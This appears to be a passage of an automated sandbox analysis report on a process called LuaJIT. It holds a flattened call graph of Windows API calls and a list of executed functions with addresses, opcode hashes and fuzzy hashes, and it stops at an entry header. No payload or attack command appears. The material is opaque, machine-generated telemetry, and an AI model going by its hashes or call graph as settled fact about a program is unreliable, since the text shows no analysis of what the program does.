7ff738b0a290 wcsftime 15 API calls 77277->77278 77281 7ff738b1e493 wcsftime 77277->77281 77278->77281 77279 7ff738b12ff4 wcsftime MultiByteToWideChar 77280 7ff738b1e505 77279->77280 77282 7ff738b1e597 77280->77282 77299 7ff738b09bf4 77280->77299 77281->77279 77281->77282 77282->77276 77309 7ff738b09294 14 API calls 2 library calls 77282->77309 77286 7ff738b1e554 77286->77282 77289 7ff738b09bf4 __crtLCMapStringW 7 API calls 77286->77289 77287 7ff738b1e5a6 77288 7ff738b0a290 wcsftime 15 API calls 77287->77288 77291 7ff738b1e5c0 wcsftime 77287->77291 77288->77291 77289->77282 77290 7ff738b09bf4 __crtLCMapStringW 7 API calls 77293 7ff738b1e641 77290->77293 77291->77282 77291->77290 77292 7ff738b1e676 77292->77282 77308 7ff738b09294 14 API calls 2 library calls 77292->77308 77293->77292 77307 7ff738b13050 WideCharToMultiByte 77293->77307 77310 7ff738b09378 77299->77310 77302 7ff738b09c37 LCMapStringEx 77304 7ff738b09cbb 77302->77304 77303 7ff738b09c89 77320 7ff738b09cd0 5 API calls 2 library calls 77303->77320 77304->77282 77304->77286 77304->77287 77306 7ff738b09c93 LCMapStringW 77306->77304 77308->77282 77309->77276 77311 7ff738b093d9 77310->77311 77318 7ff738b093d4 try_get_function 77310->77318 77311->77302 77311->77303 77312 7ff738b094bc 77312->77311 77315 7ff738b094ca GetProcAddress 77312->77315 77313 7ff738b09408 LoadLibraryExW 77314 7ff738b09429 GetLastError 77313->77314 77313->77318 77314->77318 77316 7ff738b094db 77315->77316 77316->77311 77317 7ff738b094a1 FreeLibrary 77317->77318 77318->77311 77318->77312 77318->77313 77318->77317 77319 7ff738b09463 LoadLibraryExW 77318->77319 77319->77318 77320->77306 77323 7ff738add410 77322->77323 77351 7ff738b067cc 77323->77351 77325 7ff738add41c 77357 7ff738add6f4 77325->77357 77328 7ff738add434 _RTC_Initialize 77337 7ff738add489 77328->77337 77362 7ff738add8a4 77328->77362 77329 7ff738add4b5 77329->77111 77331 7ff738add449 77365 7ff738b05f54 77331->77365 77335 7ff738add45e 77336 7ff738b06e98 26 API calls 77335->77336 77336->77337 77338 7ff738add4a5 77337->77338 77398 7ff738add9d4 7 API calls 2 library calls 77337->77398 77338->77111 77340 7ff738ae1b12 77339->77340 77341 7ff738b0921c _invalid_parameter_noinfo 14 API calls 77340->77341 77342 7ff738ae1b31 77341->77342 77416 7ff738b09294 14 API calls 2 library calls 77342->77416 77344 7ff738ae1b3f 77345 7ff738b0921c _invalid_parameter_noinfo 14 API calls 77344->77345 77346 7ff738ae1b69 77344->77346 77347 7ff738ae1b5b 77345->77347 77350 7ff738ae1b72 77346->77350 77418 7ff738b09ac8 6 API calls try_get_function 77346->77418 77417 7ff738b09294 14 API calls 2 library calls 77347->77417 77350->77111 77352 7ff738b067dd 77351->77352 77353 7ff738b067e5 77352->77353 77354 7ff738afaef8 _set_fmode 14 API calls 77352->77354 77353->77325 77355 7ff738b067f4 77354->77355 77399 7ff738b08b14 23 API calls _invalid_parameter_noinfo 77355->77399 77358 7ff738add705 77357->77358 77361 7ff738add70a __scrt_acquire_startup_lock 77357->77361 77358->77361 77400 7ff738add9d4 7 API calls 2 library calls 77358->77400 77360 7ff738add77e 77361->77328 77401 7ff738add868 77362->77401 77364 7ff738add8ad 77364->77331 77366 7ff738b05f74 77365->77366 77367 7ff738add455 77365->77367 77368 7ff738b05f92 77366->77368 77369 7ff738b05f7c 77366->77369 77367->77337 77397 7ff738add97c InitializeSListHead 77367->77397 77371 7ff738b1695c 37 API calls 77368->77371 77370 7ff738afaef8 _set_fmode 14 API calls 77369->77370 77372 7ff738b05f81 77370->77372 77373 7ff738b05f97 77371->77373 77406 7ff738b08b14 23 API calls _invalid_parameter_noinfo 77372->77406 77407 7ff738b16114 30 API calls 4 library calls 77373->77407 77376 7ff738b05fae 77408 7ff738b05d34 26 API calls 77376->77408 77378 7ff738b05feb 77409 7ff738b05ef4 14 API calls 2 library calls 77378->77409 77380 7ff738b06001 77381 7ff738b06021 77380->77381 77382 7ff738b06009 77380->77382 77411 7ff738b05d34 26 API calls 77381->77411 77383 7ff738afaef8 _set_fmode 14 API calls 77382->77383 77385 7ff738b0600e 77383->77385 77410 7ff738b09294 14 API calls 2 library calls 77385->77410 77387 7ff738b06043 77415 7ff738b09294 14 API calls 2 library calls 77387->77415 77388 7ff738b0601c 77388->77367 77390 7ff738b0603d 77390->77387 77391 7ff738b0606f 77390->77391 77392 7ff738b06088 77390->77392 77412 7ff738b09294 14 API calls 2 library calls 77391->77412 77414 7ff738b09294 14 API calls 2 library calls 77392->77414 77394 7ff738b06078 77413 7ff738b09294 14 API calls 2 library calls 77394->77413 77398->77329 77399->77353 77400->77360 77402 7ff738add882 77401->77402 77404 7ff738add87b 77401->77404 77405 7ff738b085ec 26 API calls 77402->77405 77404->77364 77405->77404 77406->77367 77407->77376 77408->77378 77409->77380 77410->77388 77411->77390 77412->77394 77413->77388 77414->77387 77415->77367 77416->77344 77417->77346 77418->77346 77420 7ff738addb37 GetStartupInfoW 77419->77420 77420->77092 77421->77120 77423 7ff738a36b92 77422->77423 77435 7ff738a44a00 77423->77435 77426 7ff738a36bee 77448 7ff738a35250 60 API calls _wcsupr_s 77426->77448 77427 7ff738a36c01 77438 7ff738a3de20 77427->77438 77430 7ff738a35116 77430->77128 77432 7ff738a35300 75 API calls 77433 7ff738a36c3d 77432->77433 77441 7ff738a3a810 77433->77441 77449 7ff738a3a530 77435->77449 77437 7ff738a36be1 77437->77426 77437->77427 77439 7ff738a33037 _mbsncpy_s 94 API calls 77438->77439 77440 7ff738a36c2b 77439->77440 77440->77432 77497 7ff738a5e2c0 77441->77497 77443 7ff738a3a842 77444 7ff738a33037 _mbsncpy_s 94 API calls 77443->77444 77445 7ff738a3a937 77443->77445 77444->77443 77446 7ff738a3b260 12 API calls 77445->77446 77447 7ff738a3a965 77446->77447 77447->77430 77448->77430 77458 7ff738a56950 77449->77458 77451 7ff738a3a559 77453 7ff738a3a55d _handle_error 77451->77453 77454 7ff738a3a57c __scrt_get_show_window_mode 77451->77454 77462 7ff738a58930 77451->77462 77453->77437 77454->77453 77455 7ff738a33037 _mbsncpy_s 94 API calls 77454->77455 77456 7ff738a3a7cb 77455->77456 77456->77453 77465 7ff738a3b260 77456->77465 77459 7ff738a56963 LoadLibraryExA 77458->77459 77461 7ff738a56982 Concurrency::details::_UnrealizedChore::_CancelViaToken 77458->77461 77460 7ff738a56986 GetProcAddressForCaller 77459->77460 77459->77461 77460->77461 77461->77451 77463 7ff738a58bb0 3 API calls 77462->77463 77464 7ff738a5894c __scrt_get_show_window_mode 77463->77464 77464->77454 77466 7ff738a3b28a 77465->77466 77475 7ff738a485d0 77466->77475 77470 7ff738a3b29e 77483 7ff738a527e0 77470->77483 77472 7ff738a3b39c 77472->77453 77473 7ff738a3b2a8 77473->77472 77487 7ff738a58ad0 77473->77487 77476 7ff738a4a220 10 API calls 77475->77476 77477 7ff738a485fe 77476->77477 77478 7ff738a3b294 77477->77478 77479 7ff738a4a360 10 API calls 77477->77479 77480 7ff738a53ed0 77478->77480 77479->77477 77491 7ff738a8a990 77480->77491 77482 7ff738a53ef3 77482->77470 77484 7ff738a5280c 77483->77484 77485 7ff738a52802 77483->77485 77484->77473 77496 7ff738a87300 VirtualFree 77485->77496 77488 7ff738a58af3 77487->77488 77489 7ff738a58b35 77488->77489 77490 7ff738a58c90 4 API calls 77488->77490 77489->77472 77490->77488 77492 7ff738a8a9ca 77491->77492 77493 7ff738a8aa0d 77492->77493 77495 7ff738a8ada0 VirtualFree 77492->77495 77493->77482 77495->77492 77496->77484 77498 7ff738a5e33e 77497->77498 77499 7ff738a5e2f6 77497->77499 77498->77443 77503 7ff738a5e6e0 WaitForSingleObject DeleteCriticalSection 77499->77503 77501 7ff738a5e300 77504 7ff738a53bb0 74 API calls 3 library calls 77501->77504 77503->77501 77504->77498 77505 7ff738a32cd9 77506 7ff738a32e9e 77505->77506 77507 7ff738a32d12 77505->77507 77508 7ff738a3aca0 _free_nolock 15 API calls 77506->77508 77514 7ff738a32dd7 77507->77514 77516 7ff738a32d98 77507->77516 77520 7ff738a3273d 77507->77520 77521 7ff738a33098 77507->77521 77509 7ff738a32ed0 77508->77509 77510 7ff738a430a0 102 API calls 77509->77510 77513 7ff738a34ac4 77510->77513 77511 7ff738a34978 77525 7ff738a870e0 17 API calls 77511->77525 77515 7ff738a35066 77516->77514 77517 7ff738a3aca0 _free_nolock 15 API calls 77516->77517 77517->77516 77518 7ff738a3aca0 _free_nolock 15 API calls 77518->77521 77519 7ff738a34941 77520->77520 77520->77521 77523 7ff738a3aca0 _free_nolock 15 API calls 77520->77523 77524 7ff738a32420 17 API calls 2 library calls 77520->77524 77521->77511 77521->77518 77521->77519 77523->77520 77525->77515 77526 7ff738a556dc 77537 7ff738a9b100 77526->77537 77529 7ff738a8aa90 16 API calls 77531 7ff738a5583b 77529->77531 77530 7ff738a5597e 77531->77530 77542 7ff738aaee70 15 API calls 2 library calls 77531->77542 77533 7ff738a5589d 77533->77530 77534 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 77533->77534 77535 7ff738a558e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 77534->77535 77543 7ff738aaf070 73 API calls _wcsupr_s 77535->77543 77544 7ff738a8ab10 77537->77544 77539 7ff738a9b138 77540 7ff738a8ab10 16 API calls 77539->77540 77541 7ff738a55725 77540->77541 77541->77529 77542->77533 77543->77530 77545 7ff738a8ab81 77544->77545 77546 7ff738a8ab2a 77544->77546 77547 7ff738a8abd2 77545->77547 77550 7ff738a8abbc 77545->77550 77548 7ff738a8ab3d 77546->77548 77549 7ff738a8ab4e 77546->77549 77556 7ff738a8ade0 VirtualProtect 77547->77556 77551 7ff738a8aee0 16 API calls 77548->77551 77560 7ff738a8ade0 VirtualProtect 77549->77560 77553 7ff738a8aee0 16 API calls 77550->77553 77554 7ff738a8ab4c 77551->77554 77553->77554 77554->77539 77557 7ff738a8ac1f 77556->77557 77557->77554 77563 7ff738a8ae40 15 API calls 2 library calls 77557->77563 77561 7ff738a8ab67 77560->77561 77561->77554 77562 7ff738a8ae40 15 API calls 2 library calls 77561->77562 77562->77554 77563->77554 77564 7ff738afac60 77565 7ff738afac7d GetModuleHandleW 77564->77565 77566 7ff738afacc7 77564->77566 77565->77566 77572 7ff738afac8a 77565->77572 77574 7ff738afab58 77566->77574 77569 7ff738afad09 77571 7ff738afad1b 77572->77566 77588 7ff738afad68 GetModuleHandleExW 77572->77588 77594 7ff738b091ac EnterCriticalSection 77574->77594 77576 7ff738afab74 77577 7ff738afab90 14 API calls 77576->77577 77578 7ff738afab7d 77577->77578 77579 7ff738b09200 _isindst LeaveCriticalSection 77578->77579 77580 7ff738afab85 77579->77580 77580->77569 77581 7ff738afad1c 77580->77581 77595 7ff738b0d484 77581->77595 77583 7ff738afad56 77585 7ff738afad68 3 API calls 77583->77585 77587 7ff738afad5d ExitProcess 77585->77587 77586 7ff738afad45 GetCurrentProcess TerminateProcess 77586->77583 77589 7ff738afad8e GetProcAddress 77588->77589 77590 7ff738afadad 77588->77590 77589->77590 77591 7ff738afada5 77589->77591 77592 7ff738afadbd 77590->77592 77593 7ff738afadb7 FreeLibrary 77590->77593 77591->77590 77592->77566 77593->77592 77596 7ff738b0d4a2 77595->77596 77597 7ff738afad29 77595->77597 77599 7ff738b09550 5 API calls try_get_function 77596->77599 77597->77583 77597->77586 77599->77597 77600 7ff738a321fc 77601 7ff738a3221f 77600->77601 77602 7ff738a4f8b0 wcsxfrm 15 API calls 77601->77602 77603 7ff738a33283 77602->77603 77604 7ff738a34a01 77605 7ff738a34a30 77604->77605 77606 7ff738a34a0c 77604->77606 77606->77605 77608 7ff738a42dc0 77606->77608 77609 7ff738afaef8 _set_fmode 14 API calls 77608->77609 77610 7ff738a42dd3 GetLastError 77609->77610 77611 7ff738a42e77 77610->77611 77612 7ff738a42ee6 77611->77612 77613 7ff738a53fc0 94 API calls 77611->77613 77616 7ff738a42f35 wcsxfrm 77612->77616 77622 7ff738a43a80 19 API calls _handle_error 77612->77622 77613->77612 77614 7ff738a43074 77617 7ff738afaef8 _set_fmode 14 API calls 77614->77617 77620 7ff738a43005 77616->77620 77623 7ff738a43a80 19 API calls _handle_error 77616->77623 77618 7ff738a43079 SetLastError 77617->77618 77618->77605 77620->77614 77624 7ff738a43a80 19 API calls _handle_error 77620->77624 77622->77616 77623->77620 77624->77614 77625 7ff738a4aca3 77626 7ff738a4acc1 77625->77626 77627 7ff738a4acb2 77625->77627 77629 7ff738a4aaa0 77626->77629 77630 7ff738a4aab8 77629->77630 77641 7ff738a4a1d0 77630->77641 77632 7ff738a4aac2 _free_nolock 77633 7ff738a4a1d0 15 API calls 77632->77633 77634 7ff738a4ab2c 77633->77634 77635 7ff738a4a1d0 15 API calls 77634->77635 77636 7ff738a4ab55 77635->77636 77637 7ff738a4a1d0 15 API calls 77636->77637 77638 7ff738a4ab7a 77637->77638 77645 7ff738a6e5f0 77638->77645 77642 7ff738a4a1e2 77641->77642 77643 7ff738a4a20a 77642->77643 77649 7ff738a49f80 15 API calls 77642->77649 77643->77632 77646 7ff738a6e628 77645->77646 77647 7ff738a4abb5 77645->77647 77648 7ff738a48d00 _free_nolock 15 API calls 77646->77648 77647->77627 77648->77647 77649->77642 77650 7ff738a31a21 77653 7ff738a4fd90 77650->77653 77652 7ff738a31a47 77654 7ff738a4fdb8 77653->77654 77655 7ff738a4feb0 wcsxfrm 77654->77655 77659 7ff738a502a6 77654->77659 77671 7ff738a4ff71 strrchr _mbsncpy_s 77654->77671 77673 7ff738a4f2a0 77654->77673 77677 7ff738a4f2f0 77654->77677 77681 7ff738a40950 15 API calls strrchr 77654->77681 77655->77671 77680 7ff738a40a70 15 API calls 2 library calls 77655->77680 77660 7ff738a502fd 77659->77660 77661 7ff738a502b7 77659->77661 77664 7ff738a5037d 77660->77664 77669 7ff738a50333 77660->77669 77682 7ff738a6e9c0 15 API calls 77661->77682 77666 7ff738a50383 77664->77666 77667 7ff738a50396 77664->77667 77665 7ff738a502f8 77665->77652 77684 7ff738a61a40 15 API calls 2 library calls 77666->77684 77685 7ff738a82fe0 15 API calls type_info::_name_internal_method 77667->77685 77683 7ff738a6e9c0 15 API calls 77669->77683 77671->77652 77674 7ff738a4f2d5 77673->77674 77675 7ff738a4f2c7 77673->77675 77674->77654 77686 7ff738a6e3f0 77675->77686 77678 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 77677->77678 77679 7ff738a4f32a 77678->77679 77679->77654 77680->77671 77681->77654 77682->77665 77683->77665 77684->77665 77685->77665 77687 7ff738a6e575 77686->77687 77688 7ff738a6e413 77686->77688 77691 7ff738a6e5bf 77687->77691 77707 7ff738a40690 15 API calls 2 library calls 77687->77707 77689 7ff738a6e467 77688->77689 77706 7ff738a40690 15 API calls 2 library calls 77688->77706 77693 7ff738a6e48c 77689->77693 77694 7ff738a6e4a6 77689->77694 77699 7ff738a6f300 77691->77699 77696 7ff738a6f300 type_info::_name_internal_method 15 API calls 77693->77696 77697 7ff738a6e4a4 memcpy_s 77694->77697 77698 7ff738a6f300 type_info::_name_internal_method 15 API calls 77694->77698 77696->77697 77697->77674 77698->77697 77700 7ff738a6f34d 77699->77700 77701 7ff738a6f38d 77700->77701 77702 7ff738a6f3eb 77700->77702 77704 7ff738a48d00 _free_nolock 15 API calls 77701->77704 77703 7ff738a48d00 _free_nolock 15 API calls 77702->77703 77705 7ff738a6f3ab memcpy_s 77703->77705 77704->77705 77705->77697 77706->77689 77707->77691 77708 7ff738a31d44 77709 7ff738a31d62 77708->77709 77710 7ff738a4c5a0 wcsxfrm 15 API calls 77709->77710 77710->77709

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00007FF734B00691 Relevance: 13.8, Strings: 2, Instructions: 11253COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $n
                                                                                                                                                                        • API String ID: 0-2632856075
                                                                                                                                                                        • Opcode ID: 9527e5a5e1fa6b575878fa84c6c09e235472329cfb16bff1f4801811506577c5
                                                                                                                                                                        • Instruction ID: 1a661b3146963cb318271c50f424d93f68e0846f67dc5ead34ab88680f593ac9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9527e5a5e1fa6b575878fa84c6c09e235472329cfb16bff1f4801811506577c5
                                                                                                                                                                        • Instruction Fuzzy Hash: F524A871814F0F9AD769DF2988886A0F3A0FF19325F948374C8AE9B5D1DB3464C2D792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0671B Relevance: 1.7, Strings: 1, Instructions: 459COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: J
                                                                                                                                                                        • API String ID: 0-1141589763
                                                                                                                                                                        • Opcode ID: a56e7a05caab9af9bf068028898b78e5ed4ec07128c54d202b5b68f81d8d36d5
                                                                                                                                                                        • Instruction ID: 45b21f8ab7585cb5df7accd9acbea775bf44091e5e1163f37a70ac5850fef2cc
                                                                                                                                                                        • Opcode Fuzzy Hash: a56e7a05caab9af9bf068028898b78e5ed4ec07128c54d202b5b68f81d8d36d5
                                                                                                                                                                        • Instruction Fuzzy Hash: EDF13830C18B4E96D71A9F358884AB1F3A0FF2A315F859379DC9E5A482DF3470C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B037C8 Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: _
                                                                                                                                                                        • API String ID: 0-701932520
                                                                                                                                                                        • Opcode ID: 06be1f57e193c88356635424a90a78936cff5563eb8ace873d1b39fd4965e912
                                                                                                                                                                        • Instruction ID: 035bae9b4656b3a1fd32e120ce4c06b89d05d89931a954a4d0b57930e240d94f
                                                                                                                                                                        • Opcode Fuzzy Hash: 06be1f57e193c88356635424a90a78936cff5563eb8ace873d1b39fd4965e912
                                                                                                                                                                        • Instruction Fuzzy Hash: FFF11A30C18B4E96D75A9F358884AB1F3A0FF2A315F559379EC9E5A482DF3470C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B07F7A Relevance: .6, Instructions: 585COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 243365fc3f55dbf6dd4c3d443cb2882f805c55e91161abbe14cbf5fe0e3d673e
                                                                                                                                                                        • Instruction ID: 0ca46fd3932070ceec4497afc200fa255a9a73fbc6c6f789528f0ee113a9ae2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 243365fc3f55dbf6dd4c3d443cb2882f805c55e91161abbe14cbf5fe0e3d673e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B222830C18B4E9AE75AAF358884AB5F3A0FF19315F848378DC8E960D1DB34B4C59297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B09615 Relevance: .6, Instructions: 559COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 682d52d32a565a0b11d60daadd7a1e94fdf04c2d47adb3038f292e7ea84cb7fb
                                                                                                                                                                        • Instruction ID: a96a16a3cfc234ed64a0f857543dd8c9bce758e065d2160198836590a36fd94b
                                                                                                                                                                        • Opcode Fuzzy Hash: 682d52d32a565a0b11d60daadd7a1e94fdf04c2d47adb3038f292e7ea84cb7fb
                                                                                                                                                                        • Instruction Fuzzy Hash: C722A770414F0B9AD799DF2884886A1F7A0FF19335F948378D4BE9B5D2DB3461C28786
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0D646 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 830c3a2a2c4752547a286b6f6faf81b5940fbf09ec5c3ec2066a76b56cbf2f3b
                                                                                                                                                                        • Instruction ID: 96a6bc7829f02a8516bbbd7c11d2599cd7db0aeedc9db264ba10de0da7fc3444
                                                                                                                                                                        • Opcode Fuzzy Hash: 830c3a2a2c4752547a286b6f6faf81b5940fbf09ec5c3ec2066a76b56cbf2f3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7EF13930C18B0E96D75AAF3584C49B1F3A0FF1A305F959379DC8EAA085DB3474D29297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0877F Relevance: .5, Instructions: 464COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: eb082c47524ef5d6c37e321d82e813628a3890c3b486fea592612210b3a1c369
                                                                                                                                                                        • Instruction ID: 66cf12effc5fd3dbdebb80621c51db1d9f166b5123b9503eda3ea06149020e9e
                                                                                                                                                                        • Opcode Fuzzy Hash: eb082c47524ef5d6c37e321d82e813628a3890c3b486fea592612210b3a1c369
                                                                                                                                                                        • Instruction Fuzzy Hash: 52024930C18F0E9AD75AAF398484AB5F3A0FF19315F849379E89E964D1DB3470C28697
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0D0F3 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b3a0dd1b469634fbe9c537d4ddbdceeee93b58cfac050f57a1ff281579d1c5a2
                                                                                                                                                                        • Instruction ID: 319a169cf6e837e97e9a1a29b5a24ef1d6c308c7d61791a95c85a2dc2f66aeef
                                                                                                                                                                        • Opcode Fuzzy Hash: b3a0dd1b469634fbe9c537d4ddbdceeee93b58cfac050f57a1ff281579d1c5a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE13A30C18B0E9AD75AAF3584C4AB5F3A1FF19305F859379D88EAA085DF3474C29297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B056FC Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b9f0d4f8930ef95fa3b3b5d0a1f51427cb5864c8b49b21f14109542709b76be5
                                                                                                                                                                        • Instruction ID: 55806bd38f19fc7c0bd4e304142ec016cc0f49e68167822169213a455658f7df
                                                                                                                                                                        • Opcode Fuzzy Hash: b9f0d4f8930ef95fa3b3b5d0a1f51427cb5864c8b49b21f14109542709b76be5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DE12830C18B0E96D75AAF3588C49B5B3A0FF19315F859379DC8E6A486DF3474C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B028C0 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2befca39d1b5830a71e6d253c93d82be84e898f0df5b0882a9919a2d68ca01c1
                                                                                                                                                                        • Instruction ID: 3b1ff1a68ff75104319edbed9afc63e2c12216cd1c3c1c886ee1e50fd63fe268
                                                                                                                                                                        • Opcode Fuzzy Hash: 2befca39d1b5830a71e6d253c93d82be84e898f0df5b0882a9919a2d68ca01c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 05E11730C18B0E96D75AAF3584C49B5F3A0FF29315F859379EC8E6A486DB3474C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0D081 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 44d6c9b764d39dcde219d4c8901edccfbe23e100efe6fef57b3d3918a6cb70fe
                                                                                                                                                                        • Instruction ID: d132e5afd1eda01f6b4f59fe412c360b92dea25c564d2cb285b597ff219237da
                                                                                                                                                                        • Opcode Fuzzy Hash: 44d6c9b764d39dcde219d4c8901edccfbe23e100efe6fef57b3d3918a6cb70fe
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE12A30C18B0E56D75AAF3584C49B5B3A0FF19305F859379EC8E6A086DF3474D68297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF734B0D9AE Relevance: .4, Instructions: 372COMMON
